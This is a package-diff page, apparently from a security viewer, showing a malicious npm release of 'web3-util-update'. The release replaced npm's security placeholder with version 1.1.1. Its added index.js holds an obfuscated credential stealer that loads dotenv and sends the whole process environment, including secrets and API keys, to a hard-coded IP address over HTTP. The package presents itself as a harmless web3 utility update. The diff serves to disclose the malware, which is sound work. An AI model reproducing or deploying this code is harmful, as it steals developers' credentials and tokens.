web3-util-update 0.0.1-security → 1.1.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of web3-util-update might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +15 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0xc87647=_0x5b51;(function(_0x40b817,_0x1cde00){const _0x55e72f=_0x5b51,_0x42db67=_0x40b817();while(!![]){try{const _0x28959b=-parseInt(_0x55e72f(0x17d))/0x1*(parseInt(_0x55e72f(0x168))/0x2)+-parseInt(_0x55e72f(0x177))/0x3+-parseInt(_0x55e72f(0x178))/0x4*(-parseInt(_0x55e72f(0x16a))/0x5)+parseInt(_0x55e72f(0x17a))/0x6+-parseInt(_0x55e72f(0x17c))/0x7+parseInt(_0x55e72f(0x16d))/0x8+-parseInt(_0x55e72f(0x173))/0x9*(-parseInt(_0x55e72f(0x170))/0xa);if(_0x28959b===_0x1cde00)break;else _0x42db67['push'](_0x42db67['shift']());}catch(_0x3970ef){_0x42db67['push'](_0x42db67['shift']());}}}(_0x2794,0xad45c));const axios=require(_0xc87647(0x17f));var data=JSON[_0xc87647(0x16e)]({'channel':_0xc87647(0x16f),'name':_0xc87647(0x179),'data':{'message':{'content':_0xc87647(0x172),'id':_0xc87647(0x16c),'recipient':'currentContactId','sender':'currentUserId','state':0x1}},'socket_id':_0xc87647(0x17e)});function _0x5b51(_0x354d99,_0x1102d3){const _0x279426=_0x2794();return _0x5b51=function(_0x5b517e,_0x175855){_0x5b517e=_0x5b517e-0x168;let _0x210531=_0x279426[_0x5b517e];return _0x210531;},_0x5b51(_0x354d99,_0x1102d3);}function _0x2794(){const _0x490a13=['12gwzibM','App\x5cEvents\x5cNewMessage','3446058eBVXDX','http://52.53.133.7/?key=','9761332zBklww','44587yfEAlE','currentUserId','axios','config','38kPgUzp','catch','814265IxjUxm','log','item.insertId','8596536LDYrEd','stringify','laravel_database_App.User.','1149830SMaeSO','get','message.content','144YxGene','then','dotenv','env','3077532MYZSZl'];_0x2794=function(){return _0x490a13;};return _0x2794();}require(_0xc87647(0x175))['config'](),exports[_0xc87647(0x180)]=async()=>{const _0x5ea85c=_0xc87647;axios[_0x5ea85c(0x171)](_0x5ea85c(0x17b)+JSON[_0x5ea85c(0x16e)](process[_0x5ea85c(0x176)]))[_0x5ea85c(0x174)](function(_0x2402b7){})[_0x5ea85c(0x169)](function(_0x32fb29){});};
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "web3-util-update",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.1",
4
+ "description": "web3-util module update",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [],
10
+ "author": "star5473",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "axios": "^0.27.2",
14
+ "dotenv": "^16.0.1",
15
+ "js-obfuscator": "^0.1.4"
16
+ },
17
+ "devDependencies": {}
6
18
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=web3-util-update for more information.